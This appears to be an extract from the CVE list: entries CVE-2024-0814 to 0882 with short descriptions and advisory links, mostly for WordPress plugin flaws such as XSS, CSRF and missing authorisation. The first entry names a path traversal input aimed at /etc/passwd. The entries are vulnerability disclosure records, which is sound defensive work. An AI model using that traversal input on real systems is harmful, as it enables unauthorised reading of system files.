CVE    2024    882    Candidate    A vulnerability was found in qwdigital LinkWechat 5.1.0. It has been classified as problematic. This affects an unknown part of the file /linkwechat-api/common/download/resource of the component Universal Download Interface. The manipulation of the argument name with the input /profile/../../../../../etc/passwd leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252033 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/biantaibao/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob/main/report.md   |   URL:https://github.com/biantaibao/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob/main/report.md   |   MISC:https://vuldb.com/?ctiid.252033   |   URL:https://vuldb.com/?ctiid.252033   |   MISC:https://vuldb.com/?id.252033   |   URL:https://vuldb.com/?id.252033    Assigned (20240125)
CVE    2024    880    Candidate    A vulnerability was found in Qidianbang qdbcrm 1.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/edit?id=2 of the component Password Reset. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252032. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/gtqbhksl/weekdays_something/blob/main/qdb_csrf.md   |   URL:https://github.com/gtqbhksl/weekdays_something/blob/main/qdb_csrf.md   |   MISC:https://vuldb.com/?ctiid.252032   |   URL:https://vuldb.com/?ctiid.252032   |   MISC:https://vuldb.com/?id.252032   |   URL:https://vuldb.com/?id.252032    Assigned (20240125)
CVE    2024    879    Candidate    Authentication bypass in vector-admin allows a user to register to a vector-admin server while “domain restriction” is active, even when not owning an authorized email address.    MISC:https://github.com/Mintplex-Labs/vector-admin/pull/128/commits/a581b8177dd6be719a5ef6d3ce4b1e939636bb41   |   URL:https://github.com/Mintplex-Labs/vector-admin/pull/128/commits/a581b8177dd6be719a5ef6d3ce4b1e939636bb41   |   MISC:https://research.jfrog.com/vulnerabilities/vector-admin-filter-bypass/   |   URL:https://research.jfrog.com/vulnerabilities/vector-admin-filter-bypass/    Assigned (20240125)
CVE    2024    871    Candidate    The Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Icon Widget 'fl_builder_data[node_preview][link]' and 'fl_builder_data[settings][link_target]' parameters in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3032810/beaver-builder-lite-version   |   URL:https://plugins.trac.wordpress.org/changeset/3032810/beaver-builder-lite-version   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/26bfef74-214f-4257-afc7-730e82e80946?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/26bfef74-214f-4257-afc7-730e82e80946?source=cve    Assigned (20240124)
CVE    2024    869    Candidate    The Instant Images – One Click Image Uploads from Unsplash, Openverse, Pixabay and Pexels plugin for WordPress is vulnerable to unauthorized arbitrary options update due to an insufficient check that neglects to verify whether the updated option belongs to the plugin on the instant-images/license REST API endpoint in all versions up to, and including, 6.1.0. This makes it possible for authors and higher to update arbitrary options.    MISC:https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91   |   URL:https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91   |   MISC:https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php   |   URL:https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php   |   MISC:https://wordpress.org/plugins/instant-images/   |   URL:https://wordpress.org/plugins/instant-images/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve    Assigned (20240124)
CVE    2024    866    Candidate    The Check & Log Email plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 1.0.9 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve    Assigned (20240124)
CVE    2024    864    Candidate    Enabling Simple Ajax Uploader plugin included in Laragon open-source software allows for a remote code execution (RCE) attack via an improper input validation in a file_upload.php file which serves as an example. By default, Laragon is not vulnerable until a user decides to use the aforementioned plugin.    MISC:https://cert.pl/en/posts/2024/02/CVE-2024-0864   |   URL:https://cert.pl/en/posts/2024/02/CVE-2024-0864   |   MISC:https://cert.pl/posts/2024/02/CVE-2024-0864   |   URL:https://cert.pl/posts/2024/02/CVE-2024-0864   |   MISC:https://laragon.org/   |   URL:https://laragon.org/    Assigned (20240124)
CVE    2024    861    Candidate    An issue has been discovered in GitLab EE affecting all versions starting from 16.4 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. Users with the `Guest` role can change `Custom dashboard projects` settings contrary to permissions.    MISC:GitLab Issue #439240   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/439240   |   MISC:HackerOne Bug Bounty Report #2316435   |   URL:https://hackerone.com/reports/2316435    Assigned (20240124)
CVE    2024    860    Candidate    The affected product is vulnerable to a cleartext transmission of sensitive information vulnerability, which may allow an attacker to capture packets to craft their own requests.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-13   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-13    Assigned (20240124)
CVE    2024    859    Candidate    The Affiliates Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9.34. This is due to missing or incorrect nonce validation on the process_bulk_action function in ListAffiliatesTable.php. This makes it possible for unauthenticated attackers to delete affiliates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php   |   URL:https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk   |   URL:https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve    Assigned (20240124)
CVE    2024    858    Candidate    The Innovs HR WordPress plugin through 1.0.3.4 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding them as employees.    MISC:https://wpscan.com/vulnerability/f6627a35-d158-495e-9d56-69405cfca221/   |   URL:https://wpscan.com/vulnerability/f6627a35-d158-495e-9d56-69405cfca221/    Assigned (20240124)
CVE    2024    856    Candidate    The Appointment Booking Calendar WordPress plugin before 1.3.83 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding a booking to the calendar without paying.    MISC:https://wpscan.com/vulnerability/eb383600-0cff-4f24-8127-1fb118f0565a/   |   URL:https://wpscan.com/vulnerability/eb383600-0cff-4f24-8127-1fb118f0565a/    Assigned (20240124)
CVE    2024    855    Candidate    The Spiffy Calendar WordPress plugin before 4.9.9 doesn't check the event_author parameter, and allows any user to alter it when creating an event, leading to deceiving users/admins that a page was created by a Contributor+.    MISC:https://wpscan.com/vulnerability/5d5da91e-3f34-46b0-8db2-354a88bdf934/   |   URL:https://wpscan.com/vulnerability/5d5da91e-3f34-46b0-8db2-354a88bdf934/    Assigned (20240124)
CVE    2024    854    Candidate    URL redirection to untrusted site ('Open Redirect') vulnerability in file access component in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 allows remote authenticated users to conduct phishing attacks via unspecified vectors.    MISC:Synology-SA-24:02 DSM   |   URL:https://www.synology.com/en-global/security/advisory/Synology_SA_24_02    Assigned (20240124)
CVE    2024    853    Candidate    curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer to the same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check.    CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0004/   |   MISC:issue   |   URL:https://hackerone.com/reports/2298922   |   MISC:json   |   URL:https://curl.se/docs/CVE-2024-0853.json   |   MISC:www   |   URL:https://curl.se/docs/CVE-2024-0853.html    Assigned (20240124)
CVE    2024    849    Candidate    Leanote version 2.7.0 allows obtaining arbitrary local files. This is possible because the application is vulnerable to LFR.    MISC:https://fluidattacks.com/advisories/alesso   |   URL:https://fluidattacks.com/advisories/alesso   |   MISC:https://github.com/leanote/desktop-app   |   URL:https://github.com/leanote/desktop-app    Assigned (20240124)
CVE    2024    844    Candidate    The Popup More Popups, Lightboxes, and more popup modules plugin for WordPress is vulnerable to Local File Inclusion in version 2.1.6 via the ycfChangeElementData() function. This makes it possible for authenticated attackers, with administrator-level access and above, to include and execute arbitrary files ending with "Form.php" on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.    MISC:https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184   |   URL:https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve    Assigned (20240123)
CVE    2024    842    Candidate    The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Denial of Service in all versions up to, and including, 1.2.5. This is due to direct access of the backuply/restore_ins.php file and. This makes it possible for unauthenticated attackers to make excessive requests that result in the server running out of resources.    MISC:https://plugins.trac.wordpress.org/changeset/3033242/backuply/trunk/restore_ins.php   |   URL:https://plugins.trac.wordpress.org/changeset/3033242/backuply/trunk/restore_ins.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve    Assigned (20240123)
CVE    2024    841    Candidate    A null pointer dereference flaw was found in the hugetlbfs_fill_super function in the Linux kernel hugetlbfs (HugeTLB pages) functionality. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.    MISC:RHBZ#2256490   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256490   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0841   |   URL:https://access.redhat.com/security/cve/CVE-2024-0841    Assigned (20240123)
CVE    2024    839    Candidate    The FeedWordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2022.0222 due to missing validation on the user controlled 'guid' key. This makes it possible for unauthenticated attackers to view draft posts that may contain sensitive information.    MISC:https://wordpress.org/plugins/feedwordpress/   |   URL:https://wordpress.org/plugins/feedwordpress/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve    Assigned (20240123)
CVE    2024    838    Candidate    The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the side image URL parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/widgets/age-gate/widget.php#L2121   |   URL:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/widgets/age-gate/widget.php#L2121   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve    Assigned (20240123)
CVE    2024    836    Candidate    The WordPress Review & Structure Data Schema Plugin – Review Schema plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtrs_review_edit() function in all versions up to, and including, 2.1.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify arbitrary reviews.    MISC:https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php   |   URL:https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve    Assigned (20240123)
CVE    2024    835    Candidate    The Royal Elementor Kit theme for WordPress is vulnerable to unauthorized arbitrary transient update due to a missing capability check on the dismissed_handler function in all versions up to, and including, 1.0.116. This makes it possible for authenticated attackers, with subscriber access or higher, to update arbitrary transients. Note, that these transients can only be updated to true and not arbitrary values.    MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail=   |   URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail=   |   MISC:https://wordpress.org/themes/royal-elementor-kit/   |   URL:https://wordpress.org/themes/royal-elementor-kit/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve    Assigned (20240123)
CVE    2024    834    Candidate    The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_to parameter in all versions up to, and including, 1.12.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve    Assigned (20240123)
CVE    2024    833    Candidate    In Telerik Test Studio versions prior to v2023.3.1330, a privilege elevation vulnerability has been identified in the applications installer component. In an environment where an existing Telerik Test Studio install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.    MISC:https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability   |   URL:https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability   |   MISC:https://www.telerik.com/teststudio   |   URL:https://www.telerik.com/teststudio    Assigned (20240123)
CVE    2024    832    Candidate    In Telerik Reporting versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component. In an environment where an existing Telerik Reporting install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.    MISC:https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability   |   URL:https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability   |   MISC:https://www.telerik.com/products/reporting.aspx   |   URL:https://www.telerik.com/products/reporting.aspx    Assigned (20240123)
CVE    2024    831    Candidate    Vault and Vault Enterprise (“Vault”) may expose sensitive information when enabling an audit device which specifies the `log_raw` option, which may log sensitive information to other audit devices, regardless of whether they are configured to use `log_raw`.    CONFIRM:https://security.netapp.com/advisory/ntap-20240223-0005/   |   MISC:https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration   |   URL:https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration   |   MISC:https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311   |   URL:https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311    Assigned (20240123)
CVE    2024    830    Candidate    The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0. This is due to missing or incorrect nonce validation on several ajax actions. This makes it possible for unauthenticated attackers to invoke those actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. As a result, they may modify comment form fields and update plugin settings.    MISC:https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php   |   URL:https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve    Assigned (20240123)
CVE    2024    829    Candidate    The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.0. This is due to missing or incorrect capability checks on several ajax actions. This makes it possible for authenticated attackers, with subscriber access or higher, to invoke those actions. As a result, they may modify comment form fields and update plugin settings.    MISC:https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php   |   URL:https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve    Assigned (20240123)
CVE    2024    828    Candidate    The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 3.6.4. This makes it possible for authenticated attackers, with subscriber access or higher, to delete, retrieve, or modify post metadata, retrieve posts contents of protected posts, modify conversion data and delete article audio.    MISC:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php   |   URL:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve    Assigned (20240123)
CVE    2024    827    Candidate    The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.4. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php   |   URL:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve    Assigned (20240123)
CVE    2024    825    Candidate    The Vimeography: Vimeo Video Gallery WordPress Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.3.2 via deserialization of untrusted input via the vimeography_duplicate_gallery_serialized in the duplicate_gallery function. This makes it possible for authenticated attackers, with contributor access or higher, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/browser/vimeography/trunk/lib/api/galleries.php#L816   |   URL:https://plugins.trac.wordpress.org/browser/vimeography/trunk/lib/api/galleries.php#L816   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve    Assigned (20240123)
CVE    2024    824    Candidate    The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Link Anything functionality in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/extensions/link-anything.php   |   URL:https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/extensions/link-anything.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve    Assigned (20240123)
CVE    2024    823    Candidate    The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' url in carousels in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php   |   URL:https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve    Assigned (20240123)
CVE    2024    822    Candidate    An authentication bypass vulnerability was found in ovirt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command.    MISC:RHBZ#2258509   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258509   |   MISC:RHSA-2024:0934   |   URL:https://access.redhat.com/errata/RHSA-2024:0934   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0822   |   URL:https://access.redhat.com/security/cve/CVE-2024-0822   |   MISC:https://github.com/oVirt/ovirt-engine/pull/914   |   URL:https://github.com/oVirt/ovirt-engine/pull/914    Assigned (20240123)
CVE    2024    821    Candidate    The Cost of Goods Sold (COGS): Cost & Profit Calculator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'section' parameter in all versions up to, and including, 3.2.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve    Assigned (20240123)
CVE    2024    820    Candidate    The Jobs for WordPress plugin before 2.7.4 does not sanitise and escape some parameters, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks    MISC:https://wpscan.com/vulnerability/fc091bbd-7338-4bd4-add5-e46502a9a949/   |   URL:https://wpscan.com/vulnerability/fc091bbd-7338-4bd4-add5-e46502a9a949/    Assigned (20240123)
CVE    2024    819    Candidate    Improper initialization of default settings in TeamViewer Remote Client prior version 15.51.5 for Windows, Linux and macOS, allow a low privileged user to elevate privileges by changing the personal password setting and establishing a remote connection to a logged-in admin account.    MISC:https://www.teamviewer.com/en/trust-center/security-bulletins/tv-2024-1001/   |   URL:https://www.teamviewer.com/en/trust-center/security-bulletins/tv-2024-1001/    Assigned (20240123)
CVE    2024    818    Candidate    Arbitrary File Overwrite Via Path Traversal in paddlepaddle/paddle before 2.6    MISC:https://huntr.com/bounties/85b06a1b-ac0b-4096-a06d-330891570cd9   |   URL:https://huntr.com/bounties/85b06a1b-ac0b-4096-a06d-330891570cd9    Assigned (20240123)
CVE    2024    817    Candidate    Command injection in IrGraph.draw in paddlepaddle/paddle 2.6.0    MISC:https://huntr.com/bounties/44d5cbd9-a046-417b-a8d4-bea6fda9cbe3   |   URL:https://huntr.com/bounties/44d5cbd9-a046-417b-a8d4-bea6fda9cbe3    Assigned (20240123)
CVE    2024    815    Candidate    Command injection in paddle.utils.download._wget_download (bypass filter) in paddlepaddle/paddle 2.6.0    MISC:https://huntr.com/bounties/83bf8191-b259-4b24-8ec9-0115d7c05350   |   URL:https://huntr.com/bounties/83bf8191-b259-4b24-8ec9-0115d7c05350    Assigned (20240123)
CVE    2024    814    Candidate    Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1463935   |   URL:https://crbug.com/1463935    Assigned (20240123)
